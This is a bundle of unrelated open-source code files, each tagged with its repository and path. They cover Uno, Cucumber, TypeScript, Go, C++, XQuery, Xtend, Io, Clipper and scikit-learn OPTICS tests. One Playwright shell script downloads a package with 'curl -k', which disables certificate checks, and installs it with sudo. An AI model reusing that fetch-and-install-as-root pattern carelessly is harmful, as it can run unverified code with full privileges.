unoPoint.Y = $0.y * $1;
return unoPoint;
@}
public static extern uCGPoint CGPointFromUnoInt2(int2 unoPoint, float scale)
@{
CGPoint point;
point.x = $0.X / $1;
point.y = $0.Y / $1;
return point;
@}
public static extern uCGPoint CGPointFromUnoFloat2(float2 unoPoint, float scale)
@{
CGPoint point;
point.x = $0.X / $1;
point.y = $0.Y / $1;
return point;
@}
public static extern uCGRect CGRectFromUnoRect(Rect unoRect, float scale)
@{
CGRect rect;
rect.origin.x = $0.Left / $1;
rect.origin.y = $0.Top / $1;
rect.size.width = ($0.Right - $0.Left) / $1;
rect.size.height = ($0.Bottom - $0.Top) / $1;
return rect;
@}
public static extern uCGRect CGRectFromUnoRecti(Recti unoRect, float scale)
@{
CGRect rect;
rect.origin.x = $0.Left / $1;
rect.origin.y = $0.Top / $1;
rect.size.width = ($0.Right - $0.Left) / $1;
rect.size.height = ($0.Bottom - $0.Top) / $1;
return rect;
@}
public static extern Recti CGRectToUnoRecti(uCGRect rect, float scale)
{
var origin = CGPointToUnoInt2(extern<uCGPoint>(rect)"$0.origin", scale);
var size = CGSizeToUnoInt2(extern<uCGSize>(rect)"$0.size", scale);
return new Uno.Recti(origin, size);
}
public static extern int2 CGSizeToUnoInt2(uCGSize size, float scale)
@{
@{Uno.Int2} unoSize;
unoSize.X = $0.width * $1;
unoSize.Y = $0.height * $1;
return unoSize;
@}
public static extern uCGSize CGSizeFromUnoInt2(int2 unoSize, float scale)
@{
CGSize size;
size.width = $0.X / $1;
size.height = $0.Y / $1;
return size;
@}
public static extern uCGSize CGSizeFromUnoFloat2(float2 unoSize, float scale)
@{
CGSize size;
size.width = $0.X / $1;
size.height = $0.Y / $1;
return size;
@}
}
}
| Uno | 4 | helilabs/fuselibs | Source/Fuse.iOS/Support.uno | [
"MIT"
] |
Feature: hub delete
Background:
Given I am "andreasbaumann" on github.com with OAuth token "OTOKEN"
Scenario: No argument in current repo
Given I am in "git://github.com/github/hub.git" git repo
When I run `hub delete`
Then the exit status should be 1
And the stderr should contain exactly:
"""
Usage: hub delete [-y] [<ORGANIZATION>/]<NAME>\n
"""
Scenario: Successful confirmation
Given the GitHub API server:
"""
delete('/repos/andreasbaumann/my-repo') {
status 204
}
"""
When I run `hub delete my-repo` interactively
And I type "yes"
Then the exit status should be 0
And the output should contain:
"""
Really delete repository 'andreasbaumann/my-repo' (yes/N)?
"""
And the output should contain:
"""
Deleted repository 'andreasbaumann/my-repo'.
"""
Scenario: Org repo
Given the GitHub API server:
"""
delete('/repos/our-org/my-repo') {
status 204
}
"""
When I run `hub delete our-org/my-repo` interactively
And I type "yes"
Then the exit status should be 0
And the output should contain:
"""
Really delete repository 'our-org/my-repo' (yes/N)?
"""
And the output should contain:
"""
Deleted repository 'our-org/my-repo'.
"""
Scenario: Invalid confirmation
When I run `hub delete my-repo` interactively
And I type "y"
Then the exit status should be 1
And the output should contain:
"""
Really delete repository 'andreasbaumann/my-repo' (yes/N)?
"""
And the stderr should contain exactly:
"""
Please type 'yes' for confirmation.\n
"""
Scenario: HTTP 403
Given the GitHub API server:
"""
delete('/repos/andreasbaumann/my-repo') {
status 403
}
"""
When I run `hub delete -y my-repo`
Then the exit status should be 1
And the stderr should contain:
"""
Please edit the token used for hub at https://github.com/settings/tokens
and verify that the `delete_repo` scope is enabled.
"""
Scenario: HTTP 403 on GitHub Enterprise
Given I am "mislav" on git.my.org with OAuth token "FITOKEN"
And $GITHUB_HOST is "git.my.org"
Given the GitHub API server:
"""
delete('/api/v3/repos/mislav/my-repo', :host_name => 'git.my.org') {
status 403
}
"""
When I run `hub delete -y my-repo`
Then the exit status should be 1
And the stderr should contain:
"""
Please edit the token used for hub at https://git.my.org/settings/tokens
and verify that the `delete_repo` scope is enabled.
"""
| Cucumber | 4 | JLLeitschuh/hub | features/delete.feature | [
"MIT"
] |
/*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { ColorTheme, ColorThemeKind } from './extHostTypes';
import { IExtHostRpcService } from 'vs/workbench/api/common/extHostRpcService';
import { ExtHostThemingShape } from 'vs/workbench/api/common/extHost.protocol';
import { Emitter, Event } from 'vs/base/common/event';
export class ExtHostTheming implements ExtHostThemingShape {
readonly _serviceBrand: undefined;
private _actual: ColorTheme;
private _onDidChangeActiveColorTheme: Emitter<ColorTheme>;
constructor(
@IExtHostRpcService _extHostRpc: IExtHostRpcService
) {
this._actual = new ColorTheme(ColorThemeKind.Dark);
this._onDidChangeActiveColorTheme = new Emitter<ColorTheme>();
}
public get activeColorTheme(): ColorTheme {
return this._actual;
}
$onColorThemeChange(type: string): void {
let kind;
switch (type) {
case 'light': kind = ColorThemeKind.Light; break;
case 'hcDark': kind = ColorThemeKind.HighContrast; break;
case 'hcLight': kind = ColorThemeKind.HighContrastLight; break;
default:
kind = ColorThemeKind.Dark;
}
this._actual = new ColorTheme(kind);
this._onDidChangeActiveColorTheme.fire(this._actual);
}
public get onDidChangeActiveColorTheme(): Event<ColorTheme> {
return this._onDidChangeActiveColorTheme.event;
}
}
| TypeScript | 4 | KevinAo22/vscode | src/vs/workbench/api/common/extHostTheming.ts | [
"MIT"
] |
<!DOCTYPE html><html><head><title>Fortunes</title></head><body>{{ content() }}</body></html> | Volt | 3 | xsoheilalizadeh/FrameworkBenchmarks | frameworks/PHP/phalcon/app/views/layouts/mongobench.volt | [
"BSD-3-Clause"
] |
#!/bin/bash
set -e
set -x
cd /tmp
curl -o ./msedge_dev.pkg -k "$1"
# Note: there's no way to uninstall previously installed MSEdge.
# However, running PKG again seems to update installation.
sudo installer -pkg /tmp/msedge_dev.pkg -target /
rm -rf /tmp/msedge_dev.pkg
/Applications/Microsoft\ Edge\ Dev.app/Contents/MacOS/Microsoft\ Edge\ Dev --version
| Shell | 3 | burner/playwright | packages/playwright-core/bin/reinstall_msedge_dev_mac.sh | [
"Apache-2.0"
] |
# Create document.
POST http://localhost:7301/documents
Content-Type: application/json
{
"documentId": "document-1",
"title": "Document 1",
"body": "john@gmail.com"
}
###
# Approve document.
POST http://localhost:7301/documents/document-1/approve
Content-Type: application/json
{
"author": "Jason",
"text": "Great job!",
"timeStamp": "2020-10-31T20:56:49Z"
}
###
# Reject document.
POST http://localhost:7301/documents/document-1/reject
Content-Type: application/json
{
"author": "Laura",
"text": "Nice try.",
"timeStamp": "2020-11-01T20:20:20Z"
}
| HTTP | 4 | tomy2105/elsa-core | src/samples/aspnet/Elsa.Samples.ContextualWorkflowHttp/workflows.http | [
"MIT"
] |
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package net
import (
"internal/poll"
"io"
)
// splice transfers data from r to c using the splice system call to minimize
// copies from and to userspace. c must be a TCP connection. Currently, splice
// is only enabled if r is a TCP or a stream-oriented Unix connection.
//
// If splice returns handled == false, it has performed no work.
func splice(c *netFD, r io.Reader) (written int64, err error, handled bool) {
var remain int64 = 1 << 62 // by default, copy until EOF
lr, ok := r.(*io.LimitedReader)
if ok {
remain, r = lr.N, lr.R
if remain <= 0 {
return 0, nil, true
}
}
var s *netFD
if tc, ok := r.(*TCPConn); ok {
s = tc.fd
} else if uc, ok := r.(*UnixConn); ok {
if uc.fd.net != "unix" {
return 0, nil, false
}
s = uc.fd
} else {
return 0, nil, false
}
written, handled, sc, err := poll.Splice(&c.pfd, &s.pfd, remain)
if lr != nil {
lr.N -= written
}
return written, wrapSyscallError(sc, err), handled
}
| Go | 4 | Havoc-OS/androidprebuilts_go_linux-x86 | src/net/splice_linux.go | [
"BSD-3-Clause"
] |
module namespace m="de/bottlecaps/railroad/xq/xhtml-to-md.xq";
declare namespace svg="http://www.w3.org/2000/svg";
declare namespace xhtml="http://www.w3.org/1999/xhtml";
declare namespace xlink="http://www.w3.org/1999/xlink";
declare namespace xsl="http://www.w3.org/1999/XSL/Transform";
declare option saxon:output "method=text";
declare variable $m:serialization-options :=
<output:serialization-parameters xmlns:output="http://www.w3.org/2010/xslt-xquery-serialization">
</output:serialization-parameters>;
declare function m:rewrite($nodes, $format, $referenced-by as xs:boolean)
{
for $node in $nodes
return
typeswitch ($node)
case document-node() return
m:rewrite($node/node(), $format, $referenced-by)
case element(svg:svg) return
if (empty($node/ancestor::xhtml:body)) then
()
else
let $name := $node/preceding::xhtml:p[1]/(.//xhtml:a, following::xhtml:a)[1]/@name
let $name :=
if ($name) then
$name
else
string(count($node/preceding::svg:svg) + 1)
let $ebnf := string-join($node/following::xhtml:div[@class="ebnf"][1]/xhtml:code/*, "
")
let $img := concat("), ")")
return
if (empty($node/following::svg:svg)) then
(
"## 
",
$img,
" <sup>generated by [RR - Railroad Diagram Generator][RR]</sup>
",
"
",
"[RR]: http://bottlecaps.de/rr/ui"
)
else
(
"**", string($name), ":**

",
$img,
"

",
if ($ebnf[.]) then
(
"```
",
$ebnf,
"
```

"
)
else
(),
let $referenced-by-links :=
if ($node/following-sibling::xhtml:p[1]/xhtml:div/@class = "ebnf") then
$node/following-sibling::xhtml:p[2]//xhtml:li/xhtml:a
else
$node/following-sibling::xhtml:p[1]//xhtml:li/xhtml:a
where exists($referenced-by-links)
return
(
"referenced by:

",
for $a in $referenced-by-links
return ("* ", data($a/@title), "
"),
"
"
)
)
case element() return
m:rewrite($node/node(), $format, $referenced-by)
default return
()
};
declare function m:transform($input as node()*) as xs:string
{
string-join(m:rewrite($input, "png", false()), "")
};
| XQuery | 4 | bannmann/rr | src/main/resources/de/bottlecaps/railroad/xq/xhtml-to-md.xq | [
"Apache-2.0"
] |
module Main
triples : Int -> List (Int, Int, Int)
triples top = [(x,y,z) | z<-[1..top], y<-[1..z], x<-[1..y],
x * x + y * y == z * z ]
main : IO ()
main = do putStrLn "Max: "
max <- getLine
printLn (triples (cast max))
| Idris | 3 | ska80/idris-jvm | benchmark/benchmarks/triples/triples.idr | [
"BSD-3-Clause"
] |
|s|{s print;s inspect println}call:"|s|{s print;s inspect println}call:"
| Fancy | 0 | MakeNowJust/quine | quine.fy | [
"Beerware"
] |
/*
* Copyright 2013 The Sculptor Project Team, including the original
* author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.sculptor.generator.template.rest
import javax.inject.Inject
import org.sculptor.generator.chain.ChainOverridable
import org.sculptor.generator.ext.Helper
import org.sculptor.generator.util.OutputSlot
import sculptormetamodel.Application
@ChainOverridable
class RestWebCssTmpl {
@Inject extension Helper helper
def String css(Application it) {
fileOutput("stylesheets/main.css", OutputSlot.TO_WEBROOT, '''
/* main elements */
body,div,td {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000;
}
body {
background-color: #fff;
background-position: top center;
background-repeat: no-repeat;
text-align: center;
min-width: 800px;
margin-top: 60px;
margin-left: auto;
margin-right: auto;
}
.formContainer {
height:400px;
}
label {
width:100px;
float:left;
margin-left: 5px;
margin-top: 0px;
}
input {
height:16px;
}
submit {
height:25px;
}
div {
text-align: left;
}
div .box {
display:block;
margin-left:105px;
}
/* header and footer elements */
#wrap {
margin:0 auto;
position:relative;
float:center;
top: 0px;
left:0px;
width:750px;
text-align:left;
}
#main {
margin:0 auto;
position:relative;
float:right;
top: 35px;
left:0px;
width:700px;
height:700px;
text-align:left;
}
.footer {
background:#fff;
border:none;
margin-top:20px;
border-top:1px solid #999999;
width:100%;
}
.footer td {color:#999999;}
.footer a:link {color: #7db223;}
/* menu elements*/
a.menu, a.menu:link, a.menu:visited {display:block; width:150px; height:25px;}
/* text styles */
h1,h2,h3 {
font-family: Helvetica, sans-serif;
color: #ae8658;
}
h1 {
font-size: 20px;
line-height: 26px;
}
h2 {
font-size: 18px;
line-height: 20px;
}
h3 {
font-size: 15px;
line-height: 21px;
color:#555;
}
h4 {
font-size: 14px;
line-height: 20px;
}
.errors {
color: red;
font-weight: bold;
display: block;
margin-left: 105px;
}
a {
text-decoration: underline;
font-size: 13px;
}
a:link {
color: #ae8658;
}
a:hover {
color: #456314;
}
a:active {
color: #ae8658;
}
a:visited {
color: #ae8658;
}
ul {
list-style: disc url(../images/bullet-arrow.png);
}
li {
padding-top: 5px;
text-align: left;
}
li ul {
list-style: square url(images/sub-bullet.gif);
}
li ul li ul {
list-style: circle none;
}
/* table elements */
table {
background: #EEEEEE;
margin: 2px 0 0 0;
border: 1px solid #BBBBBB;
border-collapse: collapse;
}
table table {
margin: -5px 0;
border: 0px solid #e0e7d3;
width: 100%;
}
table td,table th {
padding: 5px;
}
table th {
font-size: 11px;
text-align: left;
font-weight: bold;
color: #FFFFFF;
}
table thead {
font-weight: bold;
font-style: italic;
background-color: #BBBBBB;
}
table a:link {color: #303030;}
caption {
caption-side: top;
width: auto;
text-align: left;
font-size: 12px;
color: #848f73;
padding-bottom: 4px;
}
fieldset {
background: #e0e7d3;
padding: 8px;
padding-bottom: 22px;
border: none;
width: 560px;
}
fieldset label {
width: 70px;
float: left;
margin-top: 1.7em;
margin-left: 20px;
}
fieldset textfield {
margin: 3px;
height: 20px;
background: #e0e7d3;
}
fieldset textarea {
margin: 3px;
height: 165px;
background: #e0e7d3;
}
fieldset input {
margin: 3px;
height: 20px;
background: #e0e7d3;
}
fieldset table {
width: 100%;
}
fieldset th {
padding-left: 25px;
}
.table-buttons {
background-color:#fff;
border:none;
}
.table-buttons td {
border:none;
}
.submit input {
border: 1px solid #BBBBBB;
color:#777777;
padding:2px 7px;
font-size:11px;
text-transform:uppercase;
font-weight:bold;
height:24px;
}
.updated {
background:#ecf1e5;
font-size:11px;
margin-left:2px;
border:4px solid #ecf1e5;
}
.updated td {
padding:2px 8px;
font-size:11px;
color:#888888;
}
#menu {
background: #eee;
position:relative;
float:left;
top: 35px;
left:0px;
width:200px;
}
#menu ul{
list-style: none;
margin: 0;
padding: 0;
}
#menu ul li{
padding: 0px;
}
#menu a, #menu h2 {
display: block;
margin: 0;
padding: 2px 6px;
color:#FFFFFF;
}
#menu h2 {
color: #fff;
background: #648C1D;
text-transform: uppercase;
font-weight:bold;
font-size: 1em;
}
#menu a {
color: #666666;
background: #efefef;
text-decoration: none;
padding: 2px 12px;
}
#menu a:hover {
color: #648C1D;
background: #fff;
}
'''
)
}
}
| Xtend | 4 | sculptor/sculptor | sculptor-generator/sculptor-generator-templates/src/main/java/org/sculptor/generator/template/rest/RestWebCssTmpl.xtend | [
"Apache-2.0"
] |
SequenceBitTest := UnitTest clone do(
testBitsWithinFirstByte := method(
assertEquals(1, 1 asCharacter bitAt(0))
assertEquals(0, 2 asCharacter bitAt(0))
assertEquals(1, 2 asCharacter bitAt(1))
for(i, 0, 7, assertEquals(0, 0 asCharacter bitAt(i)))
for(i, 0, 7, assertEquals(1, 0xff asCharacter bitAt(i)))
)
testBitsWithinSecondByte := method(
assertEquals(1, ("\0" .. 1 asCharacter) bitAt(8 + 0))
assertEquals(0, ("\0" .. 2 asCharacter) bitAt(8 + 0))
assertEquals(1, ("\0" .. 2 asCharacter) bitAt(8 + 1))
for(i, 0, 7, assertEquals(0, ("\0" .. 0 asCharacter) bitAt(8 + i)))
for(i, 0, 7, assertEquals(1, ("\0" .. 0xff asCharacter) bitAt(8 + i)))
)
byteList := method(s,
l := list()
s sizeInBytes repeat(i,
l append(s byteAt(i))
)
l
)
testByteAtByteItemType := method(
assertEquals(list(97, 98, 99, 100), byteList("abcd"))
)
testByteAtTwoByteItemType := method(
assertEquals(list(97, 98, 99, 100), byteList("abcd" asMutable setItemType("uint16")))
)
)
| Io | 4 | akluth/io | libs/iovm/tests/correctness/SequenceBitTest.io | [
"BSD-3-Clause"
] |
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_DISTRIBUTED_RUNTIME_RPC_GRPC_CLIENT_CQ_TAG_H_
#define TENSORFLOW_CORE_DISTRIBUTED_RUNTIME_RPC_GRPC_CLIENT_CQ_TAG_H_
#include "grpcpp/grpcpp.h"
#include "tensorflow/core/distributed_runtime/rpc/grpc_util.h"
#include "tensorflow/core/lib/core/status.h"
#include "tensorflow/core/platform/macros.h"
namespace tensorflow {
// Represents a pending asynchronous client call as a tag that can be
// stored in a `grpc::CompletionQueue`.
class GrpcClientCQTag {
public:
GrpcClientCQTag() {}
virtual ~GrpcClientCQTag() {}
// OnCompleted is invoked when the RPC has finished.
// Implementations of OnCompleted can delete *this.
virtual void OnCompleted(bool ok) = 0;
private:
TF_DISALLOW_COPY_AND_ASSIGN(GrpcClientCQTag);
};
} // namespace tensorflow
#endif // TENSORFLOW_CORE_DISTRIBUTED_RUNTIME_RPC_GRPC_CLIENT_CQ_TAG_H_
| C | 4 | abhaikollara/tensorflow | tensorflow/core/distributed_runtime/rpc/grpc_client_cq_tag.h | [
"Apache-2.0"
] |
#include <opencv2/core.hpp>
#include <opencv2/videoio.hpp>
#include <opencv2/highgui.hpp>
#include <iostream>
using namespace cv;
using namespace std;
int main(int, char**)
{
Mat frame;
vector<Mat> audioData;
VideoCapture cap;
vector<int> params { CAP_PROP_AUDIO_STREAM, 0,
CAP_PROP_VIDEO_STREAM, -1 };
cap.open(0, CAP_MSMF, params);
if (!cap.isOpened())
{
cerr << "ERROR! Can't to open microphone" << endl;
return -1;
}
const int audioBaseIndex = (int)cap.get(CAP_PROP_AUDIO_BASE_INDEX);
const int numberOfChannels = (int)cap.get(CAP_PROP_AUDIO_TOTAL_CHANNELS);
cout << "CAP_PROP_AUDIO_DATA_DEPTH: " << depthToString((int)cap.get(CAP_PROP_AUDIO_DATA_DEPTH)) << endl;
cout << "CAP_PROP_AUDIO_SAMPLES_PER_SECOND: " << cap.get(CAP_PROP_AUDIO_SAMPLES_PER_SECOND) << endl;
cout << "CAP_PROP_AUDIO_TOTAL_CHANNELS: " << numberOfChannels << endl;
cout << "CAP_PROP_AUDIO_TOTAL_STREAMS: " << cap.get(CAP_PROP_AUDIO_TOTAL_STREAMS) << endl;
const double cvTickFreq = getTickFrequency();
int64 sysTimeCurr = getTickCount();
int64 sysTimePrev = sysTimeCurr;
while ((sysTimeCurr-sysTimePrev)/cvTickFreq < 10)
{
if (cap.grab())
{
for (int nCh = 0; nCh < numberOfChannels; nCh++)
{
cap.retrieve(frame, audioBaseIndex+nCh);
audioData.push_back(frame);
sysTimeCurr = getTickCount();
}
}
else
{
cerr << "Grab error" << endl;
break;
}
}
int numberOfSamles = 0;
for (auto item : audioData)
numberOfSamles+=item.cols;
cout << "Number of samples: " << numberOfSamles << endl;
return 0;
}
| C++ | 3 | nowireless/opencv | samples/cpp/videocapture_microphone.cpp | [
"Apache-2.0"
] |
#!/bin/sh
echo "Set exit on simple errors"
set -e
echo "Use dumb gradle terminal"
export TERM=dumb
rm -rf dist/package/platforms/android || true
mkdir -p dist/package/platforms/android
echo "Build android"
cd android
./gradlew --quiet assembleRelease
cd ..
cp android/widgets/build/outputs/aar/widgets-release.aar dist/package/platforms/android/widgets-release.aar
if [ "$1" ]
then
echo "Suffix package.json's version with tag: $1"
sed -i.bak 's/\(\"version\"\:[[:space:]]*\"[^\"]*\)\"/\1-'$1'"/g' ./dist/package/package.json
fi
if [ "$SKIP_PACK" ]
then
echo "SKIP pack"
else
echo "Copy NPM artefacts"
cp .npmignore LICENSE README.md package.json dist/package
echo "NPM pack"
cd dist/package
PACKAGE="$(npm pack)"
cd ../..
mv dist/package/$PACKAGE dist/$PACKAGE
echo "Output: dist/$PACKAGE"
fi | Shell | 4 | wiltonlazary/NativeScript | tns-core-modules-widgets/build.android.sh | [
"Apache-2.0"
] |
// Test file to test kate's clipper highlighting
// kate: hl Clipper;
//BEGIN INCLUDES
#include <clip-ui.ch>
#include "logo.ch"
#define PRGVERSION "0.0.1"
//END
//BEGIN CODE
static ws, win
static driver := getDriver()
/* a multiline
comment
*/
function main( formName )
local form
local fileName
if empty(formName)
?? "Usage: ./form_ui <form.xfl>&\n"
CANCEL
else
fileName := formName
endif
ws := UIWorkSpace()
form := UIForm( fileName )
win := form:parseFile()
// ?? valtype(win),chr(10)
if win == NIL
CANCEL
endif
win:show()
ws:run()
ws:quit()
return 0
/* Setting dialog */
function settingsDialog()
?? "TODO: Settings dialog&\n"
return
/* About dialog */
function aboutDialog()
local dlg := UIWindow("About", win, "aboutDlg", .F.)
local hl, lside, t, bb, bD
hl := UIHBox(,4,8)
lside := UIVBox()
lside:add(UIImage(eas_logo_mini,.T.))
hl:add(lside,.F.,.F.)
dlg:userSpace:add(hl,.T.,.T.)
t := UIVBox()
hl:add(t,.T.,.T.)
t:add(UILabel("License: GPL version 2 or later"))
bb := UIButtonBar()
t:add(bb)
bD := UIButton(win, "&Close", {|o,e| dlg:close() } )
bb:add( bD )
dlg:setFocus(bD)
dlg:setDefault(bD)
dlg:setPlacement( .T. )
dlg:show()
return
//END | xBase | 5 | dawidsowa/syntax-highlighting | autotests/input/highlight.prg | [
"MIT"
] |
#ifndef TEST_INTEROP_C_MODULES_PRINT_QUALIFIED_CLANG_TYPES_INPUTS_FOREIGN_A_H
#define TEST_INTEROP_C_MODULES_PRINT_QUALIFIED_CLANG_TYPES_INPUTS_FOREIGN_A_H
#include "textual-header.h"
#endif // TEST_INTEROP_C_MODULES_PRINT_QUALIFIED_CLANG_TYPES_INPUTS_FOREIGN_A_H
| C | 2 | gandhi56/swift | test/Interop/C/modules/print-qualified-clang-types/Inputs/foreign-a.h | [
"Apache-2.0"
] |
# Authors: Shane Grigsby <refuge@rocktalus.com>
# Adrin Jalali <adrin.jalali@gmail.com>
# License: BSD 3 clause
import numpy as np
import pytest
from sklearn.datasets import make_blobs
from sklearn.cluster import OPTICS
from sklearn.cluster._optics import _extend_region, _extract_xi_labels
from sklearn.exceptions import DataConversionWarning
from sklearn.metrics.cluster import contingency_matrix
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.cluster import DBSCAN
from sklearn.utils import shuffle
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_allclose
from sklearn.cluster.tests.common import generate_clustered_data
rng = np.random.RandomState(0)
n_points_per_cluster = 10
C1 = [-5, -2] + 0.8 * rng.randn(n_points_per_cluster, 2)
C2 = [4, -1] + 0.1 * rng.randn(n_points_per_cluster, 2)
C3 = [1, -2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C4 = [-2, 3] + 0.3 * rng.randn(n_points_per_cluster, 2)
C5 = [3, -2] + 1.6 * rng.randn(n_points_per_cluster, 2)
C6 = [5, 6] + 2 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2, C3, C4, C5, C6))
@pytest.mark.parametrize(
("r_plot", "end"),
[
[[10, 8.9, 8.8, 8.7, 7, 10], 3],
[[10, 8.9, 8.8, 8.7, 8.6, 7, 10], 0],
[[10, 8.9, 8.8, 8.7, 7, 6, np.inf], 4],
[[10, 8.9, 8.8, 8.7, 7, 6, np.inf], 4],
],
)
def test_extend_downward(r_plot, end):
r_plot = np.array(r_plot)
ratio = r_plot[:-1] / r_plot[1:]
steep_downward = ratio >= 1 / 0.9
upward = ratio < 1
e = _extend_region(steep_downward, upward, 0, 2)
assert e == end
@pytest.mark.parametrize(
("r_plot", "end"),
[
[[1, 2, 2.1, 2.2, 4, 8, 8, np.inf], 6],
[[1, 2, 2.1, 2.2, 2.3, 4, 8, 8, np.inf], 0],
[[1, 2, 2.1, 2, np.inf], 0],
[[1, 2, 2.1, np.inf], 2],
],
)
def test_extend_upward(r_plot, end):
r_plot = np.array(r_plot)
ratio = r_plot[:-1] / r_plot[1:]
steep_upward = ratio <= 0.9
downward = ratio > 1
e = _extend_region(steep_upward, downward, 0, 2)
assert e == end
@pytest.mark.parametrize(
("ordering", "clusters", "expected"),
[
[[0, 1, 2, 3], [[0, 1], [2, 3]], [0, 0, 1, 1]],
[[0, 1, 2, 3], [[0, 1], [3, 3]], [0, 0, -1, 1]],
[[0, 1, 2, 3], [[0, 1], [3, 3], [0, 3]], [0, 0, -1, 1]],
[[3, 1, 2, 0], [[0, 1], [3, 3], [0, 3]], [1, 0, -1, 0]],
],
)
def test_the_extract_xi_labels(ordering, clusters, expected):
labels = _extract_xi_labels(ordering, clusters)
assert_array_equal(labels, expected)
def test_extract_xi():
# small and easy test (no clusters around other clusters)
# but with a clear noise data.
rng = np.random.RandomState(0)
n_points_per_cluster = 5
C1 = [-5, -2] + 0.8 * rng.randn(n_points_per_cluster, 2)
C2 = [4, -1] + 0.1 * rng.randn(n_points_per_cluster, 2)
C3 = [1, -2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C4 = [-2, 3] + 0.3 * rng.randn(n_points_per_cluster, 2)
C5 = [3, -2] + 0.6 * rng.randn(n_points_per_cluster, 2)
C6 = [5, 6] + 0.2 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2, C3, C4, C5, np.array([[100, 100]]), C6))
expected_labels = np.r_[[2] * 5, [0] * 5, [1] * 5, [3] * 5, [1] * 5, -1, [4] * 5]
X, expected_labels = shuffle(X, expected_labels, random_state=rng)
clust = OPTICS(
min_samples=3, min_cluster_size=2, max_eps=20, cluster_method="xi", xi=0.4
).fit(X)
assert_array_equal(clust.labels_, expected_labels)
# check float min_samples and min_cluster_size
clust = OPTICS(
min_samples=0.1, min_cluster_size=0.08, max_eps=20, cluster_method="xi", xi=0.4
).fit(X)
assert_array_equal(clust.labels_, expected_labels)
X = np.vstack((C1, C2, C3, C4, C5, np.array([[100, 100]] * 2), C6))
expected_labels = np.r_[
[1] * 5, [3] * 5, [2] * 5, [0] * 5, [2] * 5, -1, -1, [4] * 5
]
X, expected_labels = shuffle(X, expected_labels, random_state=rng)
clust = OPTICS(
min_samples=3, min_cluster_size=3, max_eps=20, cluster_method="xi", xi=0.3
).fit(X)
# this may fail if the predecessor correction is not at work!
assert_array_equal(clust.labels_, expected_labels)
C1 = [[0, 0], [0, 0.1], [0, -0.1], [0.1, 0]]
C2 = [[10, 10], [10, 9], [10, 11], [9, 10]]
C3 = [[100, 100], [100, 90], [100, 110], [90, 100]]
X = np.vstack((C1, C2, C3))
expected_labels = np.r_[[0] * 4, [1] * 4, [2] * 4]
X, expected_labels = shuffle(X, expected_labels, random_state=rng)
clust = OPTICS(
min_samples=2, min_cluster_size=2, max_eps=np.inf, cluster_method="xi", xi=0.04
).fit(X)
assert_array_equal(clust.labels_, expected_labels)
def test_cluster_hierarchy_():
rng = np.random.RandomState(0)
n_points_per_cluster = 100
C1 = [0, 0] + 2 * rng.randn(n_points_per_cluster, 2)
C2 = [0, 0] + 50 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2))
X = shuffle(X, random_state=0)
clusters = OPTICS(min_samples=20, xi=0.1).fit(X).cluster_hierarchy_
assert clusters.shape == (2, 2)
diff = np.sum(clusters - np.array([[0, 99], [0, 199]]))
assert diff / len(X) < 0.05
def test_correct_number_of_clusters():
# in 'auto' mode
n_clusters = 3
X = generate_clustered_data(n_clusters=n_clusters)
# Parameters chosen specifically for this task.
# Compute OPTICS
clust = OPTICS(max_eps=5.0 * 6.0, min_samples=4, xi=0.1)
clust.fit(X)
# number of clusters, ignoring noise if present
n_clusters_1 = len(set(clust.labels_)) - int(-1 in clust.labels_)
assert n_clusters_1 == n_clusters
# check attribute types and sizes
assert clust.labels_.shape == (len(X),)
assert clust.labels_.dtype.kind == "i"
assert clust.reachability_.shape == (len(X),)
assert clust.reachability_.dtype.kind == "f"
assert clust.core_distances_.shape == (len(X),)
assert clust.core_distances_.dtype.kind == "f"
assert clust.ordering_.shape == (len(X),)
assert clust.ordering_.dtype.kind == "i"
assert set(clust.ordering_) == set(range(len(X)))
def test_minimum_number_of_sample_check():
# test that we check a minimum number of samples
msg = "min_samples must be no greater than"
# Compute OPTICS
X = [[1, 1]]
clust = OPTICS(max_eps=5.0 * 0.3, min_samples=10, min_cluster_size=1)
# Run the fit
with pytest.raises(ValueError, match=msg):
clust.fit(X)
def test_bad_extract():
# Test an extraction of eps too close to original eps
msg = "Specify an epsilon smaller than 0.15. Got 0.3."
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
# Compute OPTICS
clust = OPTICS(max_eps=5.0 * 0.03, cluster_method="dbscan", eps=0.3, min_samples=10)
with pytest.raises(ValueError, match=msg):
clust.fit(X)
def test_bad_reachability():
msg = "All reachability values are inf. Set a larger max_eps."
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
with pytest.warns(UserWarning, match=msg):
clust = OPTICS(max_eps=5.0 * 0.003, min_samples=10, eps=0.015)
clust.fit(X)
def test_nowarn_if_metric_bool_data_bool():
# make sure no warning is raised if metric and data are both boolean
# non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/18996
pairwise_metric = "rogerstanimoto"
X = np.random.randint(2, size=(5, 2), dtype=bool)
with pytest.warns(None) as warn_record:
OPTICS(metric=pairwise_metric).fit(X)
assert len(warn_record) == 0
